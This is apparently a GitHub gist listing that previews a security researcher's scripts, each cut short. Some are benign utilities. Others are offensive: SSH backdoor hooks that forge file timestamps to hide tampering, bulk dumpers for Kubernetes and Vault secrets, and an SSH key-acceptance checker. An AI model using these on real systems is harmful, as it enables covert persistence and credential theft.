Joshua Rogers MegaManSec
MegaManSec
/ jwt-access-token-gcp-retrieval.js
Last active
September 1, 2024 20:53
Normal (pure?) javascript. Useful for performing actions in GCP with a service account using pure JS, especially if using Cloudflare workers (which is what the "new Response" is about).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const FIREBASE_SERVICE_ACCOUNT = { | |
| "type": "service_account", | |
| "project_id": "....etc...", | |
| }; | |
| function base64EncodeWebSafe(input) { | |
| let base64 = btoa(input); | |
| return base64.replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, ''); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| curl 'https://someonewhocares.org/hosts/zero/hosts' 'https://winhelp2002.mvps.org/hosts.txt' 'https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts' --silent -k | grep --color=never '^0.0.0.0 ' | awk '{print $1" "$2}' | tr -d '\r' | sort | uniq > /usr/local/etc/blocked-hosts |
MegaManSec
/ dns-overwrite.sh
Last active
July 25, 2023 03:26
Ivanti Secure / Pulse Secure VPN MacOS DNS Overwriter
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo 'show State:/Network/Service/net.pulsesecure.pulse.nc.main/DNS' | scutil | grep -q '{' | |
| if [ $? -eq 0 ]; then | |
| scutil <<EOF | |
| get State:/Network/Service/net.pulsesecure.pulse.nc.main/DNS | |
| d.add ServerAddresses * 127.0.0.1 | |
| set State:/Network/Service/net.pulsesecure.pulse.nc.main/DNS | |
| quit | |
| EOF |
MegaManSec
/ check-pubkey-on-ssh-host.c
Last active
August 20, 2024 20:48
This small C program can be used to determine whether a public key will be accepted by a remote SSH server. That is to say, by only sending the public key to the server, we can determine whether the server would accept the key if we had the private key.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <libssh/libssh.h> | |
| int main(int argc, char *argv[]){ | |
| ssh_session session; | |
| int rc; | |
| if (argc != 5) { | |
| fprintf(stderr, "Usage: %s host user port keyfile\n", argv[0]); |
MegaManSec
/ k8s-describer.sh
Created
April 13, 2023 10:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Get the list of namespaces using kubectl | |
| namespaces=$(kubectl get namespaces -o custom-columns="NAME:.metadata.name" --no-headers) | |
| describe_and_print() { | |
| kubectl describe pod $2 > descriptions/$1/$2 | |
| echo "Described '$1/$2'" | |
| } | |
| export -f describe_and_print |
MegaManSec
/ ExecStartPost-ssh-backdoor
Created
April 5, 2023 16:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| mv /etc/ssh/sshd_config.bak /etc/ssh/sshd_config | |
| touch -r /tmp/t.tmp /etc/calendar/root | |
| touch -r /tmp/t.tmp /etc/ssh/sshd_config | |
| rm /tmp/t.tmp | |
| exit 0 |
MegaManSec
/ ExecStartPre-ssh-backdoor
Created
April 5, 2023 16:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| keysfile=`/usr/sbin/sshd -T | awk -F authorizedkeysfile '/authorizedkeysfile/ {print $NF}'` || keysfile=".ssh/authorized_keys" | |
| if [ -d "/etc/calendar/" ]; then | |
| if [ ! -e "/etc/calendar/root" ]; then | |
| touch -r /etc/calendar/ /etc/calendar/root | |
| fi | |
| else | |
| mkdir /etc/calendar/ | |
| touch -r /etc/ /etc/calendar/ |
MegaManSec
/ k8s-grabber.sh
Created
April 3, 2023 11:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Get all secrets in all namespaces | |
| secrets=$(kubectl get secrets --all-namespaces -o json) | |
| # Loop over every secret and namespace | |
| for secret in $(echo "${secrets}" | jq -r '.items[] | @base64'); do | |
| secret_data=$(echo ${secret} | base64 --decode | jq -r '.metadata.namespace + "/" + .metadata.name') | |
| namespace=$(echo ${secret_data} | cut -d '/' -f 1) | |
| secret_name=$(echo ${secret_data} | cut -d '/' -f 2) |
MegaManSec
/ gist:cabe55e9c0212e9a8a2a2d08032805a3
Created
April 2, 2023 09:25
— forked from jpuskar/gist:e7d41f44f9d565f2c4e39bf5ea80e37a
List Exported Resources via PuppetDB query
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -G -H "Accept: application/json" http://localhost:8080/pdb/query/v4/resources --data-urlencode 'query=["=","exported", true]' |
MegaManSec
/ vault-grabber.sh
Last active
April 2, 2023 23:32
Bash script to enumerate all Hasicorp Vault secrets by traversing all directories available to each key provided in the 'keys' file, and attempting to get them.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Set the Vault address and token | |
| export VAULT_ADDR=https://vault:9200/ | |
| export VAULT_FORMAT=json | |
| touch2() { | |
| mkdir -p "$(dirname "$1")" && touch "$1.data" | |
| } |
NewerOlder